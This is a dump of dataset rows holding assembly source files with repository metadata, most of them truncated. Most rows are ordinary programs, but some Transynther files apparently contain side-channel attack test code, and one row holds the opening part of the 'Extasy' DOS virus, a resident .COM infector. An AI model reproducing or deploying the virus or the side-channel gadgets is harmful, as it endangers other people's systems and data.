extern ui_window_handle_input_propagate
extern ui_window_handle_input_do_not_propagate
extern ui_window_handle_vsync_noop
extern app_... | 22.77459 | 59 | 0.823646 |
66240d764cad3c487f3dcbab70933f9fc5dba444 | 6,412 | asm | Assembly | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_2987_1740.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_2987_1740.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_2987_1740.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r13
push %r8
push %rax
push %rbp
push %rbx
lea addresses_A_ht+0x13c99, %r11
nop
and %rax, %rax
vmovups (%r11), %ymm5
vextracti128 $1, %ymm5, %xmm5
vpextrq $0, %xmm5, %r8
nop
nop
nop
nop
nop
dec %rbp
lea addresses_WC_ht+0x13521, %r10
sub %rbx, %rbx
m... | 33.925926 | 2,999 | 0.651747 |
98d47c391cd94a45964da901b427f898e23e9ce5 | 691 | asm | Assembly | list_reverse.asm | danielzy95/MIPS-Random | d9f8f74bea71d88436a0bc89924ed2d93a1b3e23 | [
"MIT"
] | null | null | null | list_reverse.asm | danielzy95/MIPS-Random | d9f8f74bea71d88436a0bc89924ed2d93a1b3e23 | [
"MIT"
] | null | null | null | list_reverse.asm | danielzy95/MIPS-Random | d9f8f74bea71d88436a0bc89924ed2d93a1b3e23 | [
"MIT"
] | null | null | null | .text
main:
list_reverse:
# Prologue
addi $sp, $sp, -12
sw $ra, 0($sp)
sw $s0, 4($sp)
sw $s1, 8($sp)
move $s0, $a0
jal list_empty
move $a0, $s0
beq $v0, $zero, end_funct
jal list_begin
move $a0, $s0
move $s0, $v0
for:
jal list_end
move $a0, $s0
beq $s1, $v0, post_for
move $a0, $... | 9.732394 | 26 | 0.515195 |
04984199fae8c771a6de042cddbda7c1f96d1df7 | 8,376 | asm | Assembly | Transynther/x86/_processed/NC/_ht_zr_/i7-7700_9_0xca_notsx.log_21829_1584.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_ht_zr_/i7-7700_9_0xca_notsx.log_21829_1584.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_ht_zr_/i7-7700_9_0xca_notsx.log_21829_1584.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %rax
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0xf0ce, %rsi
lea addresses_UC_ht+0xba4e, %rdi
nop
nop
nop
nop
sub $28615, %rdx
mov $81, %rcx
rep movsb
nop
nop
nop
nop
and $26201, %r10
lea addresses_WT_ht+0xc64e, %rbx
nop
an... | 32.339768 | 2,999 | 0.651146 |
ba511124a8acc43f516e640e7b310f483d4da3c3 | 1,017 | asm | Assembly | sk/sfx/BE.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 9 | 2017-10-09T20:28:45.000Z | 2021-06-29T21:19:20.000Z | sk/sfx/BE.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 12 | 2018-08-01T13:52:20.000Z | 2022-02-21T02:19:37.000Z | sk/sfx/BE.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 2 | 2018-02-17T19:50:36.000Z | 2019-10-30T19:28:06.000Z | Sound_BE_Header:
smpsHeaderStartSong 3
smpsHeaderVoice Sound_BE_Voices
smpsHeaderTempoSFX $01
smpsHeaderChanSFX $01
smpsHeaderSFXChannel cFM3, Sound_BE_FM3, $12, $10
; FM3 Data
Sound_BE_FM3:
smpsSetvoice $00
smpsModSet $01, $01, $2B, $0B
dc.b nA0, $29
Sound_BE_Loop00:
dc.b smpsNoAttac... | 26.076923 | 62 | 0.623402 |
3dbd68d356132d201435ce3d02922f5740ac61aa | 6,501 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0x48.log_21829_165.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0x48.log_21829_165.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i7-7700_9_0x48.log_21829_165.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %r9
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x1a60a, %rbx
clflush (%rbx)
nop
nop
cmp %r15, %r15
mov (%rbx), %r9
sub %rsi, %rsi
lea addresses_D_ht+0x12ef2, %rsi
lea addresses_D_ht+0x1e862, %rdi
nop
nop
cmp %r14, %r14
... | 38.467456 | 2,999 | 0.661283 |
78e461803ebd5f262756324c66c96655634789a1 | 235 | asm | Assembly | programs/oeis/185/A185015.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/185/A185015.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/185/A185015.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A185015: Characteristic function of 5.
; 0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
mov $1,$0
cmp $1,5
| 39.166667 | 173 | 0.544681 |
436d2f55403c2f5183a54469554af3dc131a411c | 301 | asm | Assembly | programs/oeis/253/A253212.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/253/A253212.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/253/A253212.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A253212: a(n) = 9^n + 8.
; 9,17,89,737,6569,59057,531449,4782977,43046729,387420497,3486784409,31381059617,282429536489,2541865828337,22876792454969,205891132094657,1853020188851849,16677181699666577,150094635296999129,1350851717672992097,12157665459056928809
mov $1,9
pow $1,$0
add $1,8
mov $0,$1
| 37.625 | 234 | 0.810631 |
aeec3cb3016c726201e9ba9434044a8bbbe01d99 | 250 | asm | Assembly | programs/oeis/070/A070712.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/070/A070712.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/070/A070712.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A070712: n^7 mod 31.
; 0,1,4,17,16,5,6,28,2,10,20,13,24,22,19,23,8,12,9,7,18,11,21,29,3,25,26,15,14,27,30,0,1,4,17,16,5,6,28,2,10,20,13,24,22,19,23,8,12,9,7,18,11,21,29,3,25,26,15,14,27,30,0,1,4,17,16,5,6,28,2,10,20,13,24,22,19
pow $0,7
mod $0,31
| 41.666667 | 206 | 0.612 |
7e72391e2c4071a74f0b83055525baf92f93a110 | 246 | asm | Assembly | solutions/59 - Glory Hole/size-5_speed-39.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 45 | 2018-09-05T04:56:59.000Z | 2021-11-22T08:57:26.000Z | solutions/59 - Glory Hole/size-5_speed-39.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 36 | 2018-09-01T11:34:26.000Z | 2021-05-19T23:20:49.000Z | solutions/59 - Glory Hole/size-5_speed-39.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 36 | 2018-09-01T07:44:19.000Z | 2021-09-10T19:07:35.000Z | -- 7 Billion Humans (2212:2214M) --
-- 59: Glory Hole --
-- Author: std4453
-- Size: 5
-- Speed: 39
mem1 = nearest datacube
a:
step mem1
mem1 = foreachdir nw,w,sw,n,s,ne,se:
if c == 1 and
mem1 == hole or
c > mem1:
jump a
endif
endfor
| 12.3 | 36 | 0.609756 |
37cb988ff4bc5be7296b62145bfb2c7a6cd827c9 | 164 | asm | Assembly | libsrc/_DEVELOPMENT/adt/ba_stack/c/sccz80/ba_stack_pop.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 8 | 2017-01-18T12:02:17.000Z | 2021-06-12T09:40:28.000Z | libsrc/_DEVELOPMENT/adt/ba_stack/c/sccz80/ba_stack_pop.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 1 | 2017-03-06T07:41:56.000Z | 2017-03-06T07:41:56.000Z | libsrc/_DEVELOPMENT/adt/ba_stack/c/sccz80/ba_stack_pop.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 3 | 2017-03-07T03:19:40.000Z | 2021-09-15T17:59:19.000Z |
; int ba_stack_pop(ba_stack_t *s)
SECTION code_clib
SECTION code_adt_ba_stack
PUBLIC ba_stack_pop
EXTERN asm_ba_stack_pop
defc ba_stack_pop = asm_ba_stack_pop
| 13.666667 | 36 | 0.841463 |
d8f68e60a2edf640dbb4b11d29d3df7a9453b6e3 | 1,982 | asm | Assembly | programs/oeis/004/A004188.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/004/A004188.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/004/A004188.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A004188: a(n) = n*(3*n^2 - 1)/2.
; 0,1,11,39,94,185,321,511,764,1089,1495,1991,2586,3289,4109,5055,6136,7361,8739,10279,11990,13881,15961,18239,20724,23425,26351,29511,32914,36569,40485,44671,49136,53889,58939,64295,69966,75961,82289,88959,95980,103361,111111,119239,127754,136665,145981,155711,165864,176449,187475,19... | 220.222222 | 1,898 | 0.85116 |
92e530227d90c8ea6aaea4a8c508eaf6ce7190be | 560 | asm | Assembly | Student/examples/Correct/Arrays/Correct_301.asm | SoftMoore/CPRL-Kt | c2dfdbd5b30ed6175f419398071e2f98e582d23a | [
"Unlicense"
] | 6 | 2021-02-02T10:08:02.000Z | 2022-03-24T08:10:44.000Z | Student/examples/Correct/Arrays/Correct_301.asm | SoftMoore/CPRL-Kt | c2dfdbd5b30ed6175f419398071e2f98e582d23a | [
"Unlicense"
] | 1 | 2021-02-27T21:55:26.000Z | 2021-02-28T12:39:29.000Z | Student/examples/Correct/Arrays/Correct_301.asm | SoftMoore/CPRL-Kt | c2dfdbd5b30ed6175f419398071e2f98e582d23a | [
"Unlicense"
] | 6 | 2020-02-24T13:51:32.000Z | 2021-06-05T19:02:05.000Z | PROGRAM 44
LDGADDR 0
LDCINT 0
STOREW
L0:
LDGADDR 0
LOADW
LDCINT 10
CMP
BGE L1
LDGADDR 4
LDGADDR 0
LOADW
LDCINT 4
MUL
ADD
LDCINT 2
LDGADDR 0
LOADW
MUL
STOREW
LDGADDR 0
LDGADDR 0
LOADW
LDCINT 1
ADD
STOREW
BR L0
L1:
LDGADDR 0
LDCINT 0
... | 9.824561 | 13 | 0.566071 |
b06bf3187e79e1181773c1661e7e11b1756d2db9 | 4,231 | asm | Assembly | code/audio/soundPlayer.asm | zxwanderer/A-World-of-One-way | 9c5e3142f9f225bbfcca52a4d3c9de89c00753d9 | [
"Apache-2.0"
] | 7 | 2021-04-08T15:16:14.000Z | 2021-12-05T00:36:30.000Z | code/audio/soundPlayer.asm | zxwanderer/A-World-of-One-way | 9c5e3142f9f225bbfcca52a4d3c9de89c00753d9 | [
"Apache-2.0"
] | null | null | null | code/audio/soundPlayer.asm | zxwanderer/A-World-of-One-way | 9c5e3142f9f225bbfcca52a4d3c9de89c00753d9 | [
"Apache-2.0"
] | 1 | 2021-05-25T07:27:20.000Z | 2021-05-25T07:27:20.000Z | ; Beeper engine
; Copyright (C) 2021 by Juan J. Martinez <jjm@usebox.net>
;
; Permission is hereby granted, free of charge, to any person obtaining a copy
; of this software and associated documentation files (the "Software"), to deal
; in the Software without restriction, including without limitation the rights
; to u... | 19.231818 | 80 | 0.565824 |
8b3ebf7e363af4bd65b858cb913244d8306a6e87 | 4,198 | asm | Assembly | MSDOS/Virus.MSDOS.Unknown.extasy.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | MSDOS/Virus.MSDOS.Unknown.extasy.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | MSDOS/Virus.MSDOS.Unknown.extasy.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ; Virusname: Extasy
; Origin: Sweden
; Author: Metal Militia
; This virus can be found with any anti-virus program, since it's been
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON that is..)
;
; It's a resident .COM infector, without any encryption or stealth
; capabilities. It infects when you execute (4bh) o... | 21.309645 | 72 | 0.424011 |
db2c46a31b1e0fed7a77da23ebd3d191dc266f12 | 893 | asm | Assembly | programs/oeis/129/A129792.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/129/A129792.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/129/A129792.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A129792: a(n) = ceiling(8^n/n).
; 8,32,171,1024,6554,43691,299594,2097152,14913081,107374183,780903145,5726623062,42288908761,314146179365,2345624805923,17592186044416,132458812569721,1000799917193444,7585009898729257,57646075230342349,439208192231179801,3353953467947191203,25665035232987202249,196765270119568550571,... | 81.181818 | 791 | 0.899216 |
863b9b33dcbf49d593e4262bf40ab2e7c5775678 | 70,136 | asm | Assembly | programs/forth.asm | CH-Electronics/chos | 4a5ac8b704242c60e4462a3ead7faf9ccc71229f | [
"BSD-3-Clause"
] | 312 | 2015-01-05T03:14:47.000Z | 2022-03-30T01:47:49.000Z | programs/forth.asm | ekoontz/mikeOS | 691040e1c62298bf1322984cd85d497b573be395 | [
"BSD-3-Clause"
] | 8 | 2016-08-10T16:50:33.000Z | 2021-01-26T09:37:06.000Z | programs/forth.asm | ekoontz/mikeOS | 691040e1c62298bf1322984cd85d497b573be395 | [
"BSD-3-Clause"
] | 155 | 2015-01-16T10:58:42.000Z | 2022-01-12T17:37:21.000Z | ; *****************************************************************************
; *
; * Forth operating system for an IBM Compatible PC
; * Copyright (C) 1993-2011 W Nagel
; * Copyright (C) 2014 MikeOS Developers -- see doc/LICENSE.TXT
; *
; * For the most part it follo... | 20.979958 | 91 | 0.541776 |
eb28bd21b1929d8647bf7b5521c2b9525255ea02 | 143 | asm | Assembly | libsrc/_DEVELOPMENT/math/float/math16/lm16/c/sdcc/poly_callee.asm | ahjelm/z88dk | c4de367f39a76b41f6390ceeab77737e148178fa | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/math/float/math16/lm16/c/sdcc/poly_callee.asm | C-Chads/z88dk | a4141a8e51205c6414b4ae3263b633c4265778e6 | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/math/float/math16/lm16/c/sdcc/poly_callee.asm | C-Chads/z88dk | a4141a8e51205c6414b4ae3263b633c4265778e6 | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_fp_math16
PUBLIC _polyf16_callee
EXTERN cm16_sdcc_poly_callee
defc _polyf16_callee = cm16_sdcc_poly_callee
| 20.428571 | 51 | 0.762238 |
3cee55a6f66fb232261f18a3bded1dc431496104 | 7,040 | asm | Assembly | Transynther/x86/_processed/NC/_st_zr_sm_/i7-7700_9_0x48.log_21829_1019.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_st_zr_sm_/i7-7700_9_0x48.log_21829_1019.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_st_zr_sm_/i7-7700_9_0x48.log_21829_1019.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x13ba, %rsi
lea addresses_UC_ht+0x1962a, %rdi
inc %r12
mov $27, %rcx
rep movsl
nop
nop
nop
nop
nop
and %rbx, %rbx
lea addresses_WC_ht+0x1c99b, %rsi
lea addresses_A_ht+0x12eba, %rdi
nop
... | 32.592593 | 2,999 | 0.654261 |
d8c820a91d1556b43ade042ce7a626809abff9d0 | 373 | asm | Assembly | test/test.Array.eachq.asm | richRemer/atlatl | 169c0c9c29d277dc1295e6c37b0963af6e02741a | [
"MIT"
] | null | null | null | test/test.Array.eachq.asm | richRemer/atlatl | 169c0c9c29d277dc1295e6c37b0963af6e02741a | [
"MIT"
] | null | null | null | test/test.Array.eachq.asm | richRemer/atlatl | 169c0c9c29d277dc1295e6c37b0963af6e02741a | [
"MIT"
] | null | null | null | global test_case
extern Array.eachq
extern std.outqln
%include "Array.inc"
section .text
test_case:
mov rbx, std.outqln ; function to call
lea rax, [test_arr] ; array
call Array.eachq
ret
section .data
test_arr_data: dq 0x0102030405060708
test_arr:
istruc Array
at Array.pdata, ... | 16.217391 | 46 | 0.686327 |
506bac570d08b94811201400427fa1109c821b19 | 4,616 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_715.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_715.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_715.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x11ee4, %r10
xor $1370, %rdi
movups (%r10), %xmm7
vpextrq $1, %xmm7, %r11
cmp $14380, %rbp
lea addresses_normal_ht+0x19ae4, %rsi
lea addresses_WT_ht+0x10164, %rdi
nop
nop
and $26473, %... | 56.292683 | 2,999 | 0.661828 |
ea10d7f65fd6bf5f3f7245e8ab885c8cec686c48 | 14,748 | asm | Assembly | Library/User/IACP/iacpUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Library/User/IACP/iacpUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Library/User/IACP/iacpUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT:
MODULE:
FILE: iacpUtils.asm
AUTHOR: Adam de Boor, Oct 12, 1992
ROUTINES:
Name Description
---- -----------
INT IACPLockListBlockExcl Lock the IACPLi... | 23.672552 | 79 | 0.551465 |
44b05a34962d03dd57822b9bfb6ce5c4b78ac70d | 197 | asm | Assembly | libsrc/_DEVELOPMENT/math/float/math32/lm32/c/sccz80/modf.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/math/float/math32/lm32/c/sccz80/modf.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/math/float/math32/lm32/c/sccz80/modf.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_fp_math32
PUBLIC modf
EXTERN cm32_sccz80_modf
defc modf = cm32_sccz80_modf
; SDCC bridge for Classic
IF __CLASSIC
PUBLIC _modf
EXTERN _m32_modff
defc _modf = _m32_modff
ENDIF
| 12.3125 | 29 | 0.807107 |
66e24b354fe1494bc21735c3c0f11e425f477fe5 | 42,434 | asm | Assembly | user/cat.asm | Grapefruitcc/xv6-riscv-fall19 | 6a3bb66142d1d946f8089b9cd4ebbd347c7c089a | [
"MIT-0"
] | 1 | 2021-05-26T06:35:54.000Z | 2021-05-26T06:35:54.000Z | user/cat.asm | Grapefruitcc/xv6-riscv-fall19 | 6a3bb66142d1d946f8089b9cd4ebbd347c7c089a | [
"MIT-0"
] | null | null | null | user/cat.asm | Grapefruitcc/xv6-riscv-fall19 | 6a3bb66142d1d946f8089b9cd4ebbd347c7c089a | [
"MIT-0"
] | null | null | null |
user/_cat: file format elf64-littleriscv
Disassembly of section .text:
0000000000000000 <cat>:
char buf[512];
void
cat(int fd)
{
0: 7179 addi sp,sp,-48
2: f406 sd ra,40(sp)
4: f022 sd s0,32(sp)
6: ec26 sd s1,24(sp)
8: e84a ... | 29.653389 | 62 | 0.460574 |
ea7b1d3a664f5976909ce68199e5079ceef05499 | 2,619 | asm | Assembly | chap18/ex18/qword_avx512_ass.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 374 | 2021-06-08T10:42:01.000Z | 2022-03-29T14:21:45.000Z | chap18/ex18/qword_avx512_ass.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 1 | 2021-06-11T20:24:02.000Z | 2021-06-11T20:24:02.000Z | chap18/ex18/qword_avx512_ass.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 39 | 2021-06-08T11:25:29.000Z | 2022-03-05T05:14:17.000Z | ;
; Copyright (C) 2021 by Intel Corporation
;
; Permission to use, copy, modify, and/or distribute this software for any
; purpose with or without fee is hereby granted.
;
; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
; REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHA... | 27.568421 | 89 | 0.73425 |
062c8d72793ddaa2b19aa484964aa20ec450ea1f | 3,812 | asm | Assembly | main.asm | nesdoug/SNES_04 | 9cb5b5b5f7fcec98e272f0a9494f9031a30491c5 | [
"MIT"
] | 3 | 2020-05-22T22:57:33.000Z | 2020-06-15T13:08:00.000Z | main.asm | nesdoug/SNES_04 | 9cb5b5b5f7fcec98e272f0a9494f9031a30491c5 | [
"MIT"
] | null | null | null | main.asm | nesdoug/SNES_04 | 9cb5b5b5f7fcec98e272f0a9494f9031a30491c5 | [
"MIT"
] | null | null | null | ; example 4 SNES code
.p816
.smart
.include "regs.asm"
.include "variables.asm"
.include "macros.asm"
.include "init.asm"
.segment "CODE"
; enters here in forced blank
Main:
.a16 ; the setting from init code
.i16
phk
plb
; DMA from BG_Palette to CGRAM
A8
stz CGADD ; $2121 cgram address = zero
stz $4... | 17.896714 | 67 | 0.674974 |
a8ea10471161a177bee98003579821ae4c373547 | 4,185 | asm | Assembly | Library/Chart/Series/seriesSpider.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Library/Chart/Series/seriesSpider.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Library/Chart/Series/seriesSpider.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1993 -- All Rights Reserved
PROJECT: PC/GEOS
MODULE: Chart Library
FILE: seriesSpider.asm
AUTHOR: Vijay Menon, Aug 5, 1993
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
... | 21.461538 | 79 | 0.597372 |
2da46e0d3b0ec8ba954938c1bf69acce0ecf917d | 1,030 | asm | Assembly | Transynther/x86/_processed/US/_zr_/i7-7700_9_0xca_notsx.log_13_1251.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/US/_zr_/i7-7700_9_0xca_notsx.log_13_1251.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/US/_zr_/i7-7700_9_0xca_notsx.log_13_1251.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
